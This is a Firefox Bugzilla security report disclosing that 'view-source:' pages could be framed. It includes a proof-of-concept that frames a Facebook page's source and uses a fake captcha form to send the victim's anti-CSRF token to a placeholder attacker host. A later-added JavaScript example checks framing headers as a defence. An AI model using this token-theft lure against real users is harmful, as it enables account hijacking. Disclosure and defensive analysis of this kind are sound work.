Closed
Bug 1011848
Opened 11 years ago
Closed 11 years ago
CSRF-Token Hijacking through SE + Firefox bug
Categories
(Firefox :: Security, defect)
RESOLVED DUPLICATE of bug 624883
People
(Reporter: mr.k4rizma, Unassigned)
Details
(Keywords: csectype-disclosure, sec-moderate)
Attachments
(1 file: text/html, deleted)
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36
Steps to reproduce:
Hello Brother,
Almost all websites use an anti-CSRF token in order to prevent CSRF bugs.
However,
using social engineering and a bug in Firefox, an attacker can simply steal this CSRF token.
The problem is in the "view-source:" option,
because an attacker can iframe the source code of any page unless it's using X-Frame-Options: DENY or X-Frame-Options: SAMEORIGIN.
Through iframing the source code and using CSS,
the attacker can convince the victim to enter the anti-CSRF token as if it were a captcha or anything else.
If the victim enters his anti-CSRF token,
his account will be hijacked.
This simple code is written for the exploit purpose:
<!-- PoC: frame the page *source* (view-source:) so the raw token text is rendered inside the attacker's page -->
<iframe src="view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&%3Blayout=standard&%3Bshow_faces=true&%3Bcolorscheme=light&%3Bwidth=450&%3Bheight=80">
</iframe>
<!-- fake "captcha" form: whatever the victim copies from the frame is sent to the attacker's server
     (hackersite.com is the reporter's placeholder; the scheme is added so the form posts to that host, not a relative path) -->
<form name="input" action="https://hackersite.com/malcious.php" method="get">
  To prove that you are human, enter the text that you see above: <input type="text" name="user">
  <input type="submit" value="Submit">
</form>
With a little CSS I can show only the fb_dtsg, which is the anti-CSRF token on Facebook.
Actual results:
An attacker can iframe the source code of any website.
Expected results:
The attacker shouldn't be able to iframe the source code.
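The report's claim is that the attacker can frame `view-source:` of any page unless that page sends X-Frame-Options: DENY or SAMEORIGIN, i.e. the only thing standing between the token and the bait page is the target's framing policy. The check below, added here as an example (it is not code from the report, from Facebook or from Mozilla), evaluates that policy for a given embedder from a set of constructed response headers. It goes a little beyond the report: besides X-Frame-Options it also handles CSP `frame-ancestors`, which takes precedence over X-Frame-Options when both are present. It assumes Node.js 16+ (for the WHATWG `URL` class), no network, and header samples constructed inline; `target.example`, `attacker.example`, `partner.example` and `trusted.example` are made-up hosts.

```javascript
// Added example (not from the bug report): decide whether `embedderUrl` may load
// `pageUrl` in an <iframe>, from the page's framing-related response headers.
// The "view-source:" prefix is stripped first: the policy that matters is the one
// on the underlying resource, which is what the browser fetches for the frame.
// Assumptions: Node.js 16+, headers given as [name, value] pairs, no network.

function stripViewSource(url) {
  return url.replace(/^view-source:/i, "");
}

function originOf(url) {
  return new URL(stripViewSource(url)).origin; // e.g. "https://target.example"
}

// All values of one header, case-insensitive on the name (a header may repeat).
function headerValues(headers, name) {
  const want = name.toLowerCase();
  return headers.filter(([n]) => n.toLowerCase() === want).map(([, v]) => v);
}

// Does one CSP source expression match the embedder origin?
// Supports *, 'none', 'self', scheme-source ("https:") and host-source
// ([scheme://]host[:port], host may begin with "*."). Paths are not handled.
function cspSourceMatches(src, pageOrigin, embedderOrigin) {
  const s = src.trim();
  if (s === "*") return true;
  if (s === "'none'") return false;
  if (s === "'self'") return embedderOrigin === pageOrigin;
  const emb = new URL(embedderOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(s)) return emb.protocol.toLowerCase() === s.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/]+)(?::(\d+|\*))?$/i.exec(s);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && emb.protocol.toLowerCase() !== scheme.toLowerCase() + ":") return false;
  const embHost = emb.hostname.toLowerCase();
  const h = host.toLowerCase();
  // "*.trusted.example" matches sub.trusted.example but not trusted.example itself
  if (!(wildcard ? embHost.endsWith("." + h) : embHost === h)) return false;
  if (port && port !== "*") {
    const embPort = emb.port || (emb.protocol === "https:" ? "443" : "80");
    if (embPort !== port) return false;
  }
  return true;
}

function framingDecision(headers, pageUrl, embedderUrl) {
  const pageOrigin = originOf(pageUrl);
  const embedderOrigin = originOf(embedderUrl);

  // 1. CSP frame-ancestors, when delivered, overrides X-Frame-Options entirely.
  //    Every enforced policy must allow the ancestor; a bare "frame-ancestors"
  //    with no sources is equivalent to 'none'.
  const policies = headerValues(headers, "content-security-policy")
    .flatMap((v) => v.split(";"))
    .map((d) => d.trim().split(/\s+/))
    .filter((parts) => parts[0].toLowerCase() === "frame-ancestors");
  if (policies.length > 0) {
    const allowed = policies.every((parts) =>
      parts.slice(1).some((src) => cspSourceMatches(src, pageOrigin, embedderOrigin)));
    return { allowed, reason: `CSP frame-ancestors ${allowed ? "permits" : "blocks"} ${embedderOrigin}` };
  }

  // 2. Otherwise X-Frame-Options. DENY wins over anything else; SAMEORIGIN needs a
  //    same-origin embedder. ALLOW-FROM is obsolete and, like unknown tokens, is
  //    ignored by current browsers, so it provides no protection here.
  const xfo = headerValues(headers, "x-frame-options")
    .flatMap((v) => v.split(","))
    .map((v) => v.trim().toUpperCase())
    .filter(Boolean);
  if (xfo.includes("DENY")) return { allowed: false, reason: "X-Frame-Options: DENY" };
  if (xfo.includes("SAMEORIGIN")) {
    const allowed = embedderOrigin === pageOrigin;
    return { allowed, reason: `X-Frame-Options: SAMEORIGIN (${allowed ? "same" : "cross"}-origin embedder)` };
  }
  return {
    allowed: true,
    reason: xfo.length ? `unrecognised X-Frame-Options value(s) ignored: ${xfo.join(", ")}` : "no framing policy at all",
  };
}

// Constructed samples (not real captures): the bait page on attacker.example
// framing view-source: of a page on target.example under different policies.
const EMBEDDER = "https://attacker.example/bait.html";
const PAGE = "view-source:https://target.example/account";
const SAMPLES = {
  noPolicy: [["Content-Type", "text/html"]],                       // the case in the report: frameable
  deny: [["X-Frame-Options", "DENY"]],
  sameorigin: [["X-Frame-Options", "SAMEORIGIN"]],
  cspWins: [["X-Frame-Options", "ALLOWALL"],
            ["Content-Security-Policy", "default-src 'self'; frame-ancestors 'self'"]],
  partners: [["Content-Security-Policy", "frame-ancestors https://partner.example *.trusted.example"]],
};

// Evaluate every sample for the attacker's origin; returns name -> decision.
function evaluateSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) out[name] = framingDecision(headers, PAGE, EMBEDDER);
  return out;
}

console.log(JSON.stringify(evaluateSamples(), null, 2));
```

Only the `noPolicy` sample comes out frameable, which is exactly the population the report targets; the others show the two headers a site owner can deploy, with the CSP variant also demonstrating that a permissive X-Frame-Options value is irrelevant once `frame-ancestors` is set.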
Updated•11 years ago
Component: Untriaged → Security
Comment 1•11 years ago (Reporter)
Comment 2•11 years ago (Reporter)
Comment on attachment 8424321 [details]
The PoC is a sample for a bug on (Facebook + Firefox):
><iframe src=view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&%3Blayout=standard&%3Bshow_faces=true&%3Bcolorscheme=light&%3Bwidth=450&%3Bheight=80 >
></iframe>
><form name="input" action="hackersite.com/malcious.php" method="get">
>To prouve that you are human Enter The text that you see above : <input type="text" name="user">
><input type="submit" value="Submit">
></form>
Comment 3•11 years ago
That's rather ingenious.
sec-moderate because this requires some user interaction.
Jesse or anyone, is there any good reason we should allow view-source at all in subframes, or can we just neuter it?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(jruderman)
Keywords: csectype-disclosure, sec-moderate
Comment 4•11 years ago (Reporter)
@Benjamin Smedberg
I guess there is no good reason to allow view-source in a subframe.
It will only make some trouble.
Other browsers such as Google Chrome and Opera are disabling this option.
Updated•11 years ago
Status: NEW → RESOLVED
Closed: 11 years ago
Flags: needinfo?(jruderman)
Resolution: --- → DUPLICATE
Updated•9 years ago
Group: core-security → core-security-release
Updated•8 years ago
Group: core-security-release